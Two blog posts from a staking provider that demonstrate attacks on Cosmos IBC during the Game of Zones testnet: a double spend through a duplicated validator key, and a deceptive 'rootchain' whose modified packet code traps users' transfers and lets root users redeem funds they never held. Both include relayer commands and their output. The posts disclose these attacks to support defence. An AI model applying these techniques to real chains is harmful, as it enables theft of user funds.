Vasiliy Shapovalov

CTO

2 posts
Cosmos Cosmos' Game of Zones Phase 3: Double Spend via a Double Sign

<h1 id="cosmos-game-of-zones-phase-3-double-spend-via-a-double-sign"><strong>Cosmos' Game of Zones Phase 3: Double Spend via a Double Sign</strong></h1><p>We'll show how malicious validators (or validator keys thieves) can double-spend via IBC transfers using vanilla Tendermint, cosmos-sdk and relayer software.</p><p>For an experiment we have two chains: <code>p2p-org-3</code> and <code>responsible-3</code>. On p2p-org-3 there are 1000, no more and no less, of very valuable tokens with <code>scarce</code> denom. Using our trick we can make <code>responsible-3</code> accept a total sum of <code>2000scarce</code> via a channel.</p><h2 id="double-spend-via-a-double-sign-step-by-step"><strong>Double spend via a double sign step by step</strong></h2><p>To double spend we:</p><ol><li>Open a channel from p2p-org-3 to responsible-3</li><li>Stop a single validator of p2p-org-3, replicated it in two copies (let's call them <code>p2p-org-3.1</code> and <code>p2p-org-3.2</code>, though they still have an original chain-id of <code>p2p-org-3</code>) and start again in two different exemplars.</li></ol><pre><code>p2p-org-3.2$ rly q bal p2p-org-3 100000000000ptp,1000scarce p2p-org-3.2$ rly q bal responsible-3 100000000000root,996000rsp,10transfer/hvigvvmjhcqwerty/ptp </code></pre><p>3.   Send 1000 scarce from <code>p2p-org-3.1</code>to <code>responsible-3</code>.</p><pre><code>p2p-org-3.1$ rly tx transfer p2p-org-3 responsible-3 1000scarce true $(rly ch addr responsible-3) I[2020-06-04|23:36:45.775] ✔ [p2p-org-3]@{68672} - msg(0:transfer) hash(13628DFA68099121C323DB7C2369489E1AFB71C2737B3D92B1BACAF5A9CFBB01) I[2020-06-04|23:36:56.725] ✔ [responsible-3]@{68908} - msg(0:update_client,1:ics04/opaque) hash(50F3730A339AE60A1FDB4FADF484EA8FDC870E9E46C8362BEE328D7D324FDDE8) p2p-org-3.1$ rly q bal p2p-org-3 99999999500ptp p2p-org-3.1$ rly q bal responsible-3 100000000000root,995500rsp,10transfer/hvigvvmjhcqwerty/ptp,1000transfer/hvigvvmjhcqwerty/scarce </code></pre><p>4.  Switch to <code>p2p-org-3.2</code>'s terminal - there we still have <code>1000scarce</code></p><pre><code>p2p-org-3.2$ rly q bal p2p-org-3 100000000000ptp,1000scarce p2p-org-3.2$ rly q bal responsible-3 100000000000root,995500rsp,10transfer/hvigvvmjhcqwerty/ptp,1000transfer/hvigvvmjhcqwerty/scarce </code></pre><p>5.  Send a bogus transfer (<code>100ptp</code>) from <code>p2p-org-3.2</code> to <code>responsible-3</code> - it fails     on <code>responsible-3</code> but we bump <code>p2p-org-3.2</code>'s packet count by one to be able to send further transfers succesfully.</p><pre><code>p2p-org-3.2$ rly tx transfer p2p-org-3 responsible-3 100ptp true $(rly ch addr responsible-3) I[2020-06-04|23:39:07.369] ✔ [p2p-org-3]@{68700} - msg(0:transfer) hash(EB8CAE3CDE96FF9073B54B5E6F70C43B83DA13A30E06D833AA107CEB94EE6279) I[2020-06-04|23:39:14.274] ✘ [responsible-3]@{0} - msg(0:update_client,1:ics04/opaque) err(client:15:couldn't verify counterparty packet commitment: key mismatch on operation #0: expected commitments/ports/transfer/channels/hvigvvmjhcqwerty/packets/3 but got commitments/ports/transfer/channels/hvigvvmjhcqwerty/packets/2: packet commitment verification failed) </code></pre><p>6. Succesfully send 1000 scarce from <code>p2p-org-3.2</code>to <code>responsible-3</code>.</p><pre><code>p2p-org-3.2$ rly tx transfer p2p-org-3 responsible-3 1000scarce true $(rly ch addr responsible-3) I[2020-06-04|23:40:02.589] ✔ [p2p-org-3]@{68711} - msg(0:transfer) hash(83DFA4FB75D22220ECD94F134D8A8AE5BC0D0075D2DA6021B8DA6C4688E28787) I[2020-06-04|23:40:12.237] ✔ [responsible-3]@{68947} - msg(0:update_client,1:ics04/opaque) hash(DD11048F41B6D0955EAC84D311DEF5DAD9A3F446398A59293C82A62D84F6B506) p2p-org-3.2$ rly q bal p2p-org-3 99999998900ptp [email protected]:/home/deploy$ rly q bal responsible-3 100000000000root,995000rsp,10transfer/hvigvvmjhcqwerty/ptp,2000transfer/hvigvvmjhcqwerty/scarce </code></pre><p>We think that if there's ever a real attack with stolen keys or malicious validators involved, it'll be carried out with a combination of running a fork + using modified software that can issue arbitrary IBC packets (like our own RootChain).</p><hr><p><em><em>The best way to support our contribution is to <a href="https://p2p.org/cosmos?utm_source=blog&amp;utm_medium=economy&amp;utm_campaign=phase3_post">stake ATOM with P2P Validador</a>.</em></em></p><hr><p><a href="https://p2p.org/?utm_source=blog&amp;utm_medium=economy&amp;utm_campaign=phase3_post">P2P Validator</a> is a world-leading non-custodial staking provider securing more than $40 million by over 1000 delegators/nominators across 15+ top-notch networks. We've been validating in Cosmos Hub since the first day of mainnet. P2P Validator provides comprehensive due-diligence and invested its own funds in ATOM in 2017 intending to support Cosmos network in the long term.</p><p><strong><strong>Web:</strong></strong><a href="https://p2p.org/?utm_source=blog&amp;utm_medium=economy&amp;utm_campaign=phase3_post"> https://p2p.org</a></p><p><strong><strong>Stake ATOM with us:</strong></strong> <a href="https://p2p.org/cosmos?utm_source=blog&amp;utm_medium=economy&amp;utm_campaign=phase3_post">p2p.org/cosmos</a></p><p><strong><strong>Twitter:</strong></strong><a href="https://twitter.com/p2pvalidator"> @p2pvalidator</a></p><p><strong><strong>Telegram:</strong></strong> <a href="https://t.me/P2Pstaking">https://t.me/P2Pstaking</a></p>

Vasiliy Shapovalov

from p2p validator

Cosmos Cosmos' Game of Zones Phase 3: a Deceptive Rootchain that will trap your tokens

<h1 id="cosmos-game-of-zones-phase-3-a-deceptive-rootchain-that-will-trap-your-tokens"><strong>Cosmos' Game of Zones Phase 3: a Deceptive Rootchain that will trap your tokens</strong></h1><p><em><em>For Phase 3 we prepared a specific deceptive zone whose purpose is to trap your transfers and let the zone ‘root’ users to claim them on the counterparty chains.</em></em></p><h2 id="evil-rootchain"><strong>Evil Rootchain</strong></h2><p>For Phase 3 we prepared a specific deceptive zone whose purpose is to trap your transfers and let the zone ‘root’ users to claim them on the counterparty chains.</p><p>That zone does not expose a vulnerability in IBC, neither it is something unexpected by people who made ICS: it’s merely an illustration of IBC threat model and how it can be used to steal user funds.</p><p>We modified <code>createOutgoingPacket()</code> function to work like that:</p><ul><li>user who has at least some root denom tokens (i.e. 1000root on balance) can create any outgoing transfers they want, even if they don’t have the required funds;</li><li>user who has no root tokens cannot transfer any tokens back to a source chain.</li></ul><p>Here’s the <a href="https://gist.github.com/vshvsh/88964912dbd389332c53bc239fb59168">gist</a> of how it’s done, and the <a href="https://github.com/p2p-org/gaia-rootchain">full project</a>.</p><p>So if someone was to transfer, say, doubloons to our deceptive chain, they couldn’t take it back - but any root user can redeem fake tokens for real tokens on an origin chain.</p><p>That means that a regular user who sends funds to a deceptive chain can’t cash them out on an origin chain - they’ve basically lost they funds. But it’s not apparent, because internal transfers on the zone work fine, and until a user tries to redeem the transferred token they won’t see any problems.</p><p>Moreover, malicious root token holder can redeem those tokens instead of an original sender or transferred token holders, and that wouldn’t be apparent too without aggregate analysis of all transfers across all channels.</p><p>We deployed it on responsible-3 zone (heads up: responsible was an approved sockpuppet account of p2p all along; it didn’t compete in earlier phases where scarcity and/or account throughput were an issue).</p><h2 id="demonstration"><strong>Demonstration</strong></h2><p>An unsuspecting user makes a transfer of 100 very valuable ptp tokens to responsible-3:</p><pre><code>&gt;rly tx transfer p2p-org-3 responsible-3 100ptp true cosmos16zx4s8nculu94vhm07fd3qlg8g7grtj0xk49dg I[2020-06-03|18:21:59.489] ✔ [p2p-org-3]@{50776} - msg(0:transfer) hash(962733C0568867D6F4EA70417EB1E747FCC136396E3E020D5351DAD011ACBE6D) I[2020-06-03|18:22:09.218] ✔ [responsible-3]@{50793} - msg(0:update_client,1:ics04/opaque) hash(87D2802713DB702334AB843CAD488841E5A3E1A7C95DCB0DA0344E5039A77674) </code></pre><p>They now have transferred tokens in the wallet, but can they transfer them back?</p><pre><code>&gt;rly q bal responsible-3 100transfer/fmqnwnlqii/ptp </code></pre><pre><code>&gt;rly tx transfer responsible-3 p2p-org-3 100ptp false cosmos16zx4s8nculu94vhm07fd3qlg8g7grtj0xk49dg I[2020-06-03|18:56:09.666] ✘ [responsible-3]@{51200} - msg(0:transfer) err(sdk:4:failed to execute message; message index: 0: need to be root user to send ibc source=false transfers: unauthorized) Error: failed to send first transaction </code></pre><p>No, they can’t. Here comes a root user:</p><pre><code>&gt;rly q bal responsible-3 100000000000root,975000rsp </code></pre><p>They don’t have any <code>100transfer/fmqnwnlqii/ptp</code> tokens, but they can redeem 100ptp on p2p-org-3 anyway:</p><pre><code>&gt;rly tx transfer responsible-3 p2p-org-3 100ptp false cosmos1hazzkmrvxcrxvxv98daslkw0a7uax5djqgn20d I[2020-06-03|18:58:41.425] ✔ [responsible-3]@{51230} - msg(0:transfer) hash(24456218B05964F3B7B57EFD1F25E2CEEDA9BAAEBC957D0A6E315D801929E093) I[2020-06-03|18:58:49.540] ✔ [p2p-org-3]@{51217} - msg(0:update_client,1:ics04/opaque) hash(769158A9735DF93496F08F631E5D1AB04CCF081DFC132700E25C970D33DF74DB) </code></pre><pre><code>&gt;rly q bal p2p-org-3 100ptp </code></pre><h2 id="conclusion"><strong>Conclusion</strong></h2><p>The prolonged existence of actively malicious “rootchains” is not realistic - people wouldn’t use it for anything - but we expect people might deploy temporary ones for fishing or scamming purpose when IBC connections are permissionless and IBC-enabled wallets allow arbitrary chains to be added.</p><p>More than that, any sufficiently complicated IBC-enabled blockchain can become a “rootchain” due to vulnerability, especially if we’re talking about complex smart contract chains and dynamic IBC like on Agoric or CosmWASM chains. Both trapping the funds on receiving chain forever or dishonest redeeming on source chain can be a result of an exploit on undertested code.</p><p>We think that the community should build tools for total supply observability across chains and means to swiftly stop IBC transfers with malicious or vulnerable zones or applications via governance to prevent user fund loss.</p><hr><p><em><em>The best way to support our contribution is to <a href="https://p2p.org/cosmos?utm_source=blog&amp;utm_medium=economy&amp;utm_campaign=phase3_post">stake ATOM with P2P Validador</a>.</em></em></p><hr><p><a href="https://p2p.org/?utm_source=blog&amp;utm_medium=economy&amp;utm_campaign=phase3_post">P2P Validator</a> is a world-leading non-custodial staking provider securing more than $40 million by over 1000 delegators/nominators across 15+ top-notch networks. We've been validating in Cosmos Hub since the first day of mainnet. P2P Validator provides comprehensive due-diligence and invested its own funds in ATOM in 2017 intending to support Cosmos network in the long term.</p><p><strong><strong>Web:</strong></strong><a href="https://p2p.org/?utm_source=blog&amp;utm_medium=economy&amp;utm_campaign=phase3_post"> https://p2p.org</a></p><p><strong><strong>Stake ATOM with us:</strong></strong> <a href="https://p2p.org/cosmos?utm_source=blog&amp;utm_medium=economy&amp;utm_campaign=phase3_post">p2p.org/cosmos</a></p><p><strong><strong>Twitter:</strong></strong><a href="https://twitter.com/p2pvalidator"> @p2pvalidator</a></p><p><strong><strong>Telegram:</strong></strong> <a href="https://t.me/P2Pstaking">https://t.me/P2Pstaking</a></p>

Vasiliy Shapovalov

from p2p validator